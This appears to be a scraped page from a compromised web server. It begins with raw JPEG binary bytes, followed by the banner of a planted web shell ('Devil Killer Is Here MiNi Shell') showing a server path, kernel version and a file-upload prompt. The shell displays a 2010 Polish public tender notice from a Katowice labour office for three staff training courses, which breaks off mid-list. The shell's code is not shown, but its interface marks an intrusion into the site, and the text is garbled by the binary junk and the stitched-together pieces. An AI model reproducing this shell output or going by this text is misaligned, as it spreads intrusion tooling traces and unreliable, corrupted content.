JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/81961-N-2010.html

<p class="kh_header"><b>Katowice: zorganizowanie i przeprowadzenie trzech części szkoleń.</b><br>
<b>Numer ogłoszenia: 81961 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie trzech części szkoleń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu trzech szkoleń w ramach projektu własnego nt.-Publiczne Służby Zatrudnienia: PROFESJONALIZM - SKUTECZNOŚĆ - ZAANGAŻOWANIE- realizowanego przez Wojewódzki Urząd Pracy w Katowicach w ramach Poddziałania 6.1.2, Działania 6.1, Priorytetu VI Programu Operacyjnego Kapitał Ludzki dla  pracowników PUP i pracowników WUP w Katowicach.
Postępowanie prowadzone zostanie w zakresach: 

1)	Część I - Nowoczesne metody i narzędzia w pośrednictwie pracy
2)	Część II - Pomoc, obsługa i aktywizacja klientów niepełnosprawnych
3)	Część III - Outplacement

przy czym szkolenia z część I i II to szkolenia wyjazdowe, a szkolenie z części III jest szkoleniem stacjonarnym. Wszystkie szkolenia mają zostać prowadzone w języku polskim.
Szkolenia wyjazdowe mają zostać zorganizowane w całorocznych obiektach hotelarskich lub innych obiektach, w których świadczone są usługi hotelarskie co najmniej o standardzie trzygwiazdkowym, położnym na terenie województwa śląskiego, w regionie Podbeskidzia,


Część I
Zorganizowanie i przeprowadzenie wyjazdowego szkolenia w terminie 26 - 27 kwietnia 2010 r. dla 37 osób. W celu prawidłowej realizacji przedmiotu zamówienia należy:

1) 	opracować materiały szkoleniowe i przekazać w wersji elektronicznej do Zespołu Projektu - z uwzględnieniem opisu zawartego poniżej w ad. 1), w dniu podpisania umowy, a Zamawiający dokona akceptacji lub naniesie uwagi, w terminie 1 dnia kalendarzowego,  

1)	przygotować materiały w wersji papierowej dla każdego uczestnika szkolenia

3)	przekazać materiały uczestnikowi szkolenia w dniu rozpoczęcia szkolenia,

Opracowane i przygotowane materiały szkoleniowe należy odpowiednio oznakować logotypami: Program Operacyjny Kapitał Ludzki, Śląskie. Pozytywna energia. Unia Europejska - Europejski Fundusz Społeczny.

4)	zabezpieczyć salę szkoleniową wyposażoną w sprzęt niezbędny do prowadzenia szkolenia,

5)	zapewnić dla każdego uczestnika miejsce noclegowe w pokojach jednoosobowych,

6)	zapewnić pełne wyżywienie oraz przerwy kawowe, 

7)	przedstawić do akceptacji przez Zespół Projektu certyfikat z oznakowaniem logotypami Program Operacyjny Kapitał Ludzki, Śląskie. Pozytywna energia. Unia Europejska - Europejski Fundusz Społeczny - Zamawiający dokona akceptacji lub naniesie uwagi, w terminie 1 dnia roboczego,  

8)	wydać certyfikaty potwierdzające udział w szkoleniu osobom w nim uczestniczącym. 

9)	zapewnić środek transportu wraz z kierowcą na trasie:
1)	Katowice, ul. Kościuszki 30, na miejsce szkolenia
2)	z miejsca szkolenia na Plac Andrzeja w Katowicach.

ad 1)	Harmonogram szkolenia obejmować będzie 16 godzin, przy czym godzina szkoleniowa wynosi 60 minut. Zakres szkolenia powinien obejmować następujące zagadnienia:
1)	Aktualnie obowiązujące akty prawne w pośrednictwie pracy 
2)	Prawidłową i efektywną organizację usług pośrednictwa pracy wg obowiązujących standardów - poszczególne procedury dotyczące ofert pracy, bezrobotnych i pracodawców 
3)	Techniki, formy, sposoby i metody prowadzenia nowoczesnego pośrednictwa pracy
4)	Skuteczne i  nowoczesne narzędzia wspomagające prace pośrednika 
5)	Segmentacje klientów pośrednictwa pracy oraz dopasowywanie działań i instrumentów do poszczególnych oczekiwań klientów 
6)	Marketing i promocję usług oferowanych przez urząd 
7)	Komunikację interpersonalną jako niezbędny element efektywnej współpracy z klientami urzędu
8)	Prawidłowe sporządzanie dokumentacji i niezbędnych baz danych
9)	Badanie efektywności poszczególnych działań pośrednictwa pracy 
10)	Nowoczesne standardy pracy pośrednika pracy w tym uwzględnienie nowych standardów w pośrednictwie pracy.


ad. 5) Z usługi hotelarskiej korzystać będzie łącznie 37 osób. Szkolenie ma zostać zorganizowane w całorocznym obiekcie hotelarskim lub innym obiekcie, w którym świadczone są usługi hotelarskie położnym na terenie województwa śląskiego, w regionie Podbeskidzia o standardzie co najmniej trzygwiazdkowym. Ostateczna ilość pracowników biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem szkolenia. Zakwaterowanie uczestników szkolenia nastąpi w pokojach jednoosobowych: 

Pokoje powinny mieć powierzchnię min. 10 m2. Minimalne wyposażenie pokoi: łóżko, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, biurko lub stół, krzesło lub inny mebel do siedzenia (nie mniej niż 2 na pokój), lustro, wieszak na okrycie wierzchnie, telewizor. Wszystkie pokoje powinny posiadać łazienki wyposażone min w: wannę z baterią i natryskiem lub kabinę natryskową, umywalkę z blatem lub półką, WC, zestaw ręczników,
 
 ad. 6)	zapewnienie dla uczestników pełnego wyżywienia, przy czym usługa restauracyjna rozpoczyna się od:
-	śniadania w dniu przyjazdu i zakończy się przerwą kawową z bufetem kanapkowym w ostatnim dniu szkolenia.

Śniadania, obiady i kolacje powinny być podawane w innej sali niż sala wykładowa,   
Śniadania  podawane w formie szwedzkiego bufetu, w tym co najmniej:
	-	pieczywo - różnorodne, 
	-	danie na ciepło: jajecznica, kiełbaski,
	-	wędliny - różnorodne,
	-	sery: żółte, pleśniowe, białe,
	-	dżemy,
-	mleko: ciepłe, zimne,
	-	przetwory jogurtowe,
	-	płatki śniadaniowe,
	-	świeże warzywa: pomidory, ogórek zielony,
-	napoje różnorodne: kawa, herbata, soki, woda mineralna gazowana 
i niegazowana,
-	dodatki: cytryna, cukier, mleko, masło, 

Obiady, w tym każdy składający się z: 
-	zupy,
-	drugiego dania (mięsne z dodatkiem ziemniaków lub ryżu lub frytek lub klusek i zestawu surówek),
-	deseru (deser lodowy lub kawałek ciasta typu jabłecznik lub sernik lub makowiec),
-	napoju: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
-	dodatków: cytryna, cukier, mleko.

Wszystkie składniki obiadu podawanego pierwszego dnia szkolenia powinny być różne od składników obiadu podawanego w drugim dniu szkolenia. 

Przerwy kawowe - sześć podczas pobytu, po trzy w każdym dniu szkolenia:
-	wszystkie przerwy zawierać mają bufet kanapkowy lub wyroby cukiernicze różnorodne, napoje: kawa, herbata, soki, woda mineralna gazowana i niegazowana, dodatki: cytryna, cukier, mleko.

Kolacja w pierwszym dniu szkolenia składać się będzie z: 
-	dania głównego podanego na ciepło,
-	zimnej płyty składającej się z różnorodnych: wędlin, serów, 3 rodzajów sałatek,
-	napojów różnorodnych: kawa, herbata, soki, woda mineralna gazowana  i niegazowana
-	dodatków: cytryna, cukier, mleko.

Wszystkie składniki kolacji powinny być różne od składników obiadów podawanych podczas dwóch dni szkolenia. 

Sale szkoleniowe - dwie sale szkoleniowe, w układzie podkowy do przeprowadzania warsztatów dla dwóch grup, wyposażone w sprzęt niezbędny do przeprowadzenia szkoleń, w tym: laptop, rzutnik multimedialny oraz tablicę typu flipchart.



CZĘŚĆ II 
Zorganizowanie i przeprowadzenie dwóch edycji dwudniowego, wyjazdowego szkolenia. Szkolenie przeprowadzone zostanie w dniach 17 - 18 maja 2010 r. jako pierwsza edycja oraz w dniach 24 - 25 maja 2010 r. jako druga edycja. W każdej z edycji udział weźmie po 18 uczestników. W celu prawidłowej realizacji przedmiotu zamówienia należy:

1) 	opracować materiały szkoleniowe i przekazać w wersji elektronicznej do Zespołu Projektu - z uwzględnieniem opisu zawartego poniżej w ad. 1), w terminie siedmiu dni przed planowanym terminem szkolenia; Zamawiający dokona akceptacji lub naniesie uwagi, w terminie 3 dni roboczych,  

2)	przygotować materiały w wersji papierowej dla każdego uczestnika szkolenia

3)	przekazać materiały uczestnikowi szkolenia w dniu rozpoczęcia szkolenia,

Opracowane i przygotowane materiały szkoleniowe należy odpowiednio oznakować logotypami: Program Operacyjny Kapitał Ludzki, Śląskie. Pozytywna energia. Unia Europejska - Europejski Fundusz Społeczny.

4)	zabezpieczyć salę szkoleniową wyposażoną w sprzęt niezbędny do prowadzenia szkolenia,

5)	zapewnić dla każdego uczestnika miejsce noclegowe,

6)	zapewnić pełne wyżywienie oraz przerwę kawową, 

7)	przedstawić do akceptacji przez Zespół Projektu certyfikat z oznakowaniem logotypami Program Operacyjny Kapitał Ludzki, Śląskie. Pozytywna energia. Unia Europejska - Europejski Fundusz Społeczny - Zamawiający dokona akceptacji lub naniesie uwagi, w terminie 3 dni roboczych,  

8)	wydać certyfikaty potwierdzające udział w szkoleniu osobom w nim uczestniczącym. 

9)	zapewnić środek transportu wraz z kierowcą na trasie:
1)	Katowice, ul. Kościuszki 30, na miejsce szkolenia
2)	z miejsca szkolenia na Plac Andrzeja w Katowicach.

Ad. 1)	Harmonogram szkolenia obejmować będzie po 16 godzin szkoleniowych, w każdej edycji szkolenia, przy czym godzina szkoleniowa wynosi 60 minut. Szkolenie w zakresie -Pomoc, obsługa i aktywizacja klientów niepełnosprawnych- ma na celu zapoznanie uczestników z problematyką osób niepełnosprawnych w tym przygotowania uczestników do prowadzenia poradnictwa zawodowego dla osób niepełnosprawnych, ze szczególnym uwzględnieniem tematów:
1)	Wprowadzenie w problematykę osób niepełnosprawnych
2)	Pojęcie osoby niepełnosprawnej
3)	Rodzaje niepełnosprawności
4)	Ocena przydatności zawodowej osoby niepełnosprawnej
5)	Możliwości zawodowe osób z różnymi rodzajami niepełnosprawności
6)	Rehabilitacja zawodowa osób niepełnosprawnych
7)	Możliwości zatrudnienia osób niepełnosprawnych
8)	Uprawnienia osób niepełnosprawnych na rynku pracy
 
ad. 5)	Z usługi hotelarskiej korzystać będzie łącznie 36 osób, po 18 osób w każdej edycji szkolenia. Szkolenie ma zostać zorganizowane w całorocznym obiekcie hotelarskim lub innym obiekcie, w którym świadczone są usługi hotelarskie położnym na terenie województwa śląskiego, w regionie Podbeskidzia o standardzie co najmniej trzygwiazdkowym. Ostateczna ilość pracowników biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem szkolenia. Zakwaterowanie uczestników szkolenia nastąpi w pokojach jednoosobowych:  

Pokoje powinny mieć powierzchnię min. 10 m2. Minimalne wyposażenie pokoi: łóżko, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, biurko lub stół, krzesło lub inny mebel do siedzenia (nie mniej niż 2 na pokój), lustro, wieszak na okrycie wierzchnie, telewizor. Wszystkie pokoje powinny posiadać łazienki wyposażone min w: wannę z baterią i natryskiem lub kabinę natryskową, umywalkę z blatem lub półką, WC, zestaw ręczników,

ad. 6)	zapewnienie dla uczestników każdej z edycji pełnego wyżywienia, przy czym usługa restauracyjna rozpoczyna się od:
-	śniadania w dniu przyjazdu i zakończy się przerwą kawową z bufetem kanapkowym w ostatnim dniu szkolenia.


Śniadania, obiady i kolacje powinny być podawane w innej sali niż sala wykładowa, w tym dla każdego uczestnika szkolenia, podczas pobytu:  
Śniadania  podawane w formie szwedzkiego bufetu, w tym co najmniej:
-	pieczywo - różnorodne, 
-	danie na ciepło: jajecznica, kiełbaski,
-	wędliny - różnorodne,
-	sery: żółte, pleśniowe, białe,
-	dżemy,
-	mleko: ciepłe, zimne,
-	przetwory jogurtowe,
-	płatki śniadaniowe,
-	świeże warzywa: pomidory, ogórek zielony,
-	napoje różnorodne: kawa, herbata, soki, woda mineralna gazowana 
i niegazowana,
-	dodatki: cytryna, cukier, mleko, masło, 

Obiady, w tym każdy składający się z: 
-	zupy,
-	drugiego dania (mięsne z dodatkiem ziemniaków lub ryżu lub frytek lub klusek i zestawu surówek),
-	deseru (deser lodowy lub kawałek ciasta typu jabłecznik lub sernik lub makowiec),
-	napoju: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
-	dodatków: cytryna, cukier, mleko.

Wszystkie składniki obiadu podawanego pierwszego dnia szkolenia powinny być różne od składników obiadu podawanego w drugim dniu szkolenia. 

Przerwy kawowe - sześć podczas pobytu, po trzy w każdym dniu szkolenia:
-	wszystkie przerwy zwierać mają bufet kanapkowy lub wyroby cukiernicze różnorodne, napoje: kawa, herbata, soki, woda mineralna gazowana i niegazowana, dodatki: cytryna, cukier, mleko.

Kolacja w pierwszym dniu szkolenia składać się będzie z: 
-	dania głównego podanego na ciepło,
-	zimnej płyty składającej się z różnorodnych: wędlin, serów, 3 rodzajów sałatek,
-	napojów różnorodnych: kawa, herbata, soki, woda mineralna gazowana  i niegazowana
-	dodatków: cytryna, cukier, mleko.

Wszystkie składniki kolacji powinny być różne od składników obiadów podawanych podczas dwóch dni szkolenia. 

Sala szkoleniowa, w układzie podkowy do przeprowadzania szkolenia,  wyposażona w sprzęt niezbędny do przeprowadzenia szkoleń, w tym: laptop, rzutnik multimedialny oraz tablicę typu flipchart.



CZĘŚĆ III 
Zorganizowanie i przeprowadzenie trzech edycji jednodniowego stacjonarnego  szkolenia z zakresu -Outplacement-. Szkolenie przeprowadzone zostanie w dniach 11, 14, 18 czerwca 2010 r. na terenie miasta Katowice. W każdej z edycji udział weźmie po 12 uczestników. W celu prawidłowej realizacji przedmiotu zamówienia należy:

1) 	opracować materiały szkoleniowe i przekazać w wersji elektronicznej do Zespołu Projektu - z uwzględnieniem opisu zawartego poniżej w ad. 1), w terminie siedmiu dni przed planowanym terminem szkolenia; Zamawiający dokona akceptacji lub naniesie uwagi, w terminie 3 dni roboczych,  

3)	przygotować materiały w wersji papierowej dla każdego uczestnika szkolenia

4)	przekazać materiały uczestnikowi szkolenia w dniu rozpoczęcia każdej edycji szkolenia,

Opracowane i przygotowane materiały szkoleniowe należy odpowiednio oznakować logotypami: Program Operacyjny Kapitał Ludzki, Śląskie. Pozytywna energia. Unia Europejska - Europejski Fundusz Społeczny.

5)	zabezpieczyć salę szkoleniową wyposażoną w sprzęt niezbędny do prowadzenia szkolenia,

6)	zapewnić wyżywienie oraz przerwy kawowe, 

7)	przedstawić do akceptacji przez Zespół Projektu certyfikat z oznakowaniem logotypami Program Operacyjny Kapitał Ludzki, Śląskie. Pozytywna energia. Unia Europejska - Europejski Fundusz Społeczny - Zamawiający dokona akceptacji lub naniesie uwagi, w terminie 3 dni roboczych,  

8)	wydać certyfikaty potwierdzające udział w szkoleniu osobom w nim uczestniczącym. 


Ad. 1)	Harmonogram szkolenia obejmować będzie po 8 godzin szkoleniowych, w każdej edycji szkolenia, przy czym godzina szkoleniowa wynosi 60 minut. Szkolenie w zakresie -Outplacement-. Celem szkolenia jest zapoznanie uczestników szkolenia z zagadnieniem programów wspierających procesy zwolnień w firmach oraz z osiągnięciem korzyści outpacement-u dla pracownika objętego programem oraz firmy zwalniającej, ze szczególnym uwzględnieniem:
1)	Ustawy o szczególnych zasadach rozwiązywania z pracownikami stosunku pracy z przyczyn niedotyczących  pracowników,
2)	Przyczyn zwolnień,
3)	Sposobów rozwiązywania stosunku pracy z pracownikami,
4)	Konsultacji związkowych,
5)	Porozumienia i regulaminu zwolnień grupowych,
6)	Wypowiedzenia umowy o pracę pracownikowi, w tym odprawa pieniężna oraz konieczność ponownego zatrudnienia pracownika,

Ad. 5)	zapewnienie sali wykładowej dla co najmniej 20 osób wyposażonej w sprzęt niezbędny do prowadzenia szkolenia. Sala szkoleniowa - w układzie podkowy, wyposażona w sprzęt niezbędny do przeprowadzenia szkoleń, w tym: laptop, rzutnik multimedialny oraz tablicę typu flipchart.

Ad. 6)	zapewnienie dla każdego uczestnika wyżywienia składającego się z trzech przerw kawowych i obiadu, w każdej edycji szkolenia.
	Obiad i przerwy kawowe powinny być podawane w innej sali niż sala wykładowa.
	Obiad składać się będzie z:
	-	zupy,
	-	dania głównego (mięsne z dodatkiem ziemniaków lub ryżu lub frytek lub klusek i zestawu surówek),
-	deseru (deser lodowy lub kawałek ciasta typu jabłecznik lub sernik lub makowiec),
-	napoju: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
-	dodatków: cytryna, cukier, mleko..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w każdej części postępowania jest wniesienie wadium w wysokości: 

1)	1 230,00 zł (słownie: jeden tysiąc dwieście trzydzieści złotych 00/100) 
- dla I części;

2)	1190,00 (słownie: jeden tysiąc sto dziewięćdziesiąt złotych 00/100) 
- dla II części;

3)	590,00 zł (słownie: pięćset dziewięćdziesiąt złotych 00/100)- dla III części,
  
III.1.2)	Wadium w formie pieniądza należy wpłacać na konto nr 
52 1560 0013 2367 0237 0105 0001 prowadzone w GETIN Bank S.A. II ODDZIAŁ W KATOWICACH

III.1.3) W pozostałych formach:
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2)	gwarancjach bankowych;
3)	gwarancjach ubezpieczeniowych, 
4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) wadium należy złożyć w siedzibie Zamawiającego tj. ul. Kościuszki 30, III piętro, pok. 352 - KANCELARIA, od poniedziałku do piątku w godzinach 8:00 do 15:00).

III.1.4)	Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 15 kwietnia 2010 r. do godz. 10:00.

III.1.5) W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie będzie decydować data wpływu środków na rachunek bankowy Zamawiającego.

III.1.6) Zamawiający zwraca  wadium :
1)	wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. III.1.9),
	2)	niezwłocznie na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
3)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy.

III.1.7) Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze najkorzystniejszej oferty, a toczyło się postępowanie odwoławcze i w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Ponowne wniesienie wadium nastąpi w terminie określonym przez Zamawiającego.

III.1.8) Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

III.1.9) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:
1)	w odpowiedzi na wezwanie nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
2)	którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
  3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
1)	wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali co najmniej 5 usług w zakresie objętym przedmiotem zamówienia o wartości łącznej nie mniejszej niż 40 000,- zł;

Część II 
1)	 wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali co najmniej 5 usług w zakresie objętym przedmiotem zamówienia o wartości łącznej nie mniejszej niż 35 000,- zł;

Część III	

1)	wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 5 usług o wartości łącznej nie mniejszej niż 15 000,- zł;


Opis sposobu dokonywania oceny spełnienia tego warunku - Wykonawca przedstawi wykaz wraz z dokumentami potwierdzającymi należyte wykonanie zrealizowanego zamówienia, a Zamawiający dokona oceny spełnienia warunku na podstawie złożonego wykazu - załączniki do SIWZ - Nr 5.I.; Nr 5.II.; Nr 5.III. - wg formuły -spełnia-nie spełnia-. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I 
1)	dysponują, w terminie 26-27 kwietnia 2010 r., wolnymi pokojami jednoosobowymi w ilości nie mniejszej niż 37, których powierzchnia mieszkalna jest nie mniejsza niż 10 m2, w całorocznych obiektach hotelarskich lub innych obiektach, w których świadczone są usługi hotelarskie o standardzie co najmniej trzygwiazdkowym, położnym na terenie województwa śląskiego, w regionie Podbeskidzia,

2)	dysponują dwoma salami konferencyjnymi wyposażonymi w co najmniej: rzutnik multimedialny, laptop, tablice flipchart, przy czym jedna  dla co najmniej 40 osób, a druga dla co najmniej 20 osób;

3)	dysponują autokarem do przewozu osób w ilości nie mniejszej niż 40 osób,  


Część II

1)	dysponują, wolnymi pokojami jednoosobowymi w ilości nie mniejszej niż: 
-	18 w terminie 17 - 18 maja 2010 r.
-	18 w terminie 24 - 25 maja 2010 r.,
